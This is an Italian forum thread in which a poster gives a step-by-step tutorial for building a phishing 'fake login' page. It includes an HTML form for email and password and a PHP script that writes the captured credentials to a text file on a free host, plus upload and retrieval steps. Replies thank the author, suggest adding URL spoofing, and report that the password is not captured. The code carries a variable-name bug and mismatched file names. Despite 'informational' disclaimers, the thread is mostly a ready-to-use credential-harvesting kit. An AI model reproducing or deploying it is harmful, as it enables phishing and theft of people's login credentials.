Realizzare un fake login

« Older   Newer »
  Share  
HDS619
view post Posted on 14/12/2007, 19:44




CITAZIONE
Il Fake Login è una schermata di login, ad un certo servizio, fittizia. Infatti essa, o immagazzina i dati oppure li spedisce ad un certo indirizzo eMail.

I Fake Login sono spesso trasmessi via eMail, e si riconoscono dal link di destinazione. Attraverso fake login si possono rubare indirizzi email

Ok, faccio anche un'altra guida su come realizzare un Fake Login, ricordo che è puramente a scopo informativo e non mi assumo nessuna responsabilità di quello che qualche lamerozzo decidesse di fare! Quello che spiego si può benissimo conoscere studiando un minimo di html e php.

Occorrenti base:
-Un blocco note
-Spazio su web che gestisce anche documenti php ( consiglio altervista )
-Fantasia


Bene apriamo il blocco note e scriviamo:
CODICE
<html>
<head>
<title>PROVA DI UN FAKE LOGIN</title>
</head>
<body>
<!-- Creiamo un form che invia i dati col metodo "POST" per non far vedere niente all'utente a una pagina di nome fakelogin.php che costruiremo successivamente che servirà a prendere i dat inviati -->
<form name="fake login" method="post" action="fakelogin.php">
E-mail: <input type="text" value="" name="nome"><br>
Password: <input  type="password" value="" name="pass"><br>
<input type="submit" name="invia" value="INVIA" >
</form>
</body>
</html>


Bene salviamo il tutto come "fakelogin.htm"
Ora come avrete sicuramente visto dal form invia col metodo "post" i dati a una pagina chiamata "fakelogin.php"

Ora non ci resta che prendere quei dati!
Apriamo di nuovo il blocco note e scriviamo:
CODICE
<html>
<head>
<title>Dati inviati</title>
</head>
<body>
Grazie per aver inviato i dati.

<!-- Ora arriva la parte in php che nel sorgente finale visibile all'utente non ci sarà -->
<?php
   /* Recuperiamo i dati.. */
   $email = $_POST['nome'];
   $password = $_POST['pass'];

   /* Apriamo il file Contatti.txt per l'aggiunta di testo */
   $fakefile = fopen("Contatti.txt", "a");
   /* Scriviamo i dati */
   fwrite($fakefile, "Email: $email   Password: $pass\n");
   /* Chiudiamo il file */
   fclose($fakefile);
?>
</body>
</html>


Salviamo tutto col nome fakelogin.php

Ecco come avete visto questo documento apre per l'aggiunta di testo un file di nome "dati.txt" e scrive in modo ordinata ognuno su ogni riga, l'email e la password di colui che ha fatto il login.

Ora non ci resta che creare un file di nome Contatti.txt e scrivere:
CODICE
##########################################
#   PAGINA DI ARCHIVIAZIONE DATI INVIATI #
#   TRAMITE IL NOSTRO FAKE LOGIN         #
##########################################


carichiamo il tutto online et voilà fake login pronto.
bastera accedere all'indirizzo: http://tuosito.altervista.org/fakelogin.htm
inserire dei dati e premere INVIA automaticamente i dati saranno scritti sul file dati.txt quindi per controllare i dati basta andare all'indirizzo: http://tuosito.altervista.org/dati.txt e li abbiamo belli incolonnati ^_^

Il bello di questa tecnica è che operando col php e quindi facendo girare tutto sul lato server l'utente non vedrà mai e poi mai cosa fa la pagina...

Beh chiudo qui i possibili usi di questa cosa penso siano venuti in mente un pò a tutti. ripeto ancora una volta NO LAMEROZZI un conto è informarsi e sono completamente pro a qualunque tipo di informazione ma che rimanga informazione e non si usano le cose imparata per provocare danni a altri utenti, anche perchè qui si entra nella illegalità se si effettuano attacchi di "phishing"..... spero di essermi spiegato.

Ciauz ;)

P.s.: Ricordo anche che è vietato dalle linee guida di altervista ( ma è anche punibile dalla legge ) fare attacchi di phishing.
 
Top
Torre1992
view post Posted on 15/12/2007, 16:01




grazie 1000... molto bello... un po da lamerone ma utile...
 
Top
Lukk--
view post Posted on 15/12/2007, 16:19




Bè si, basta non usarlo per altri scopi, però è utile e bello...
 
Top
HDS619
view post Posted on 15/12/2007, 19:20




CITAZIONE (Torre1992 @ 15/12/2007, 16:01)
grazie 1000... molto bello... un po da lamerone ma utile...

Diciamo che l'ho creato per informare su come funziona un fake login... naturalmente se lo si deve utilizzare per fare i lameroni... penso sia meglio toglierlo ;)
 
Top
Lukk--
view post Posted on 16/12/2007, 14:07




Nono, tranquillo lascialo...nessuno in grado di fare cose del genere, o che le vuole fare bazzica questo forum!...
 
Top
ste.1991
view post Posted on 25/12/2007, 22:45




Dopo gli metti anke un bello script ke ti modifica l'url visualizzato ed è fatta...
cmq state attenti ke la postale sta molto attenta al phishing e se vi prendono sono problemi seri
 
Top
Davistan90Style
view post Posted on 6/11/2010, 09:11




ma in che senso creare un file di nome contatti.tx ecc..??
 
Top
™Skym93™
view post Posted on 12/5/2013, 17:50




Ma Lol?
 
Top
vocetta
view post Posted on 30/3/2014, 11:24




Carino!
 
Top
civa72
view post Posted on 24/12/2015, 17:37




non mi ariva la password ma solo la mail

aiuto non mi arriva la password

rispondete
 
Top
9 replies since 14/12/2007, 19:44   20292 views
  Share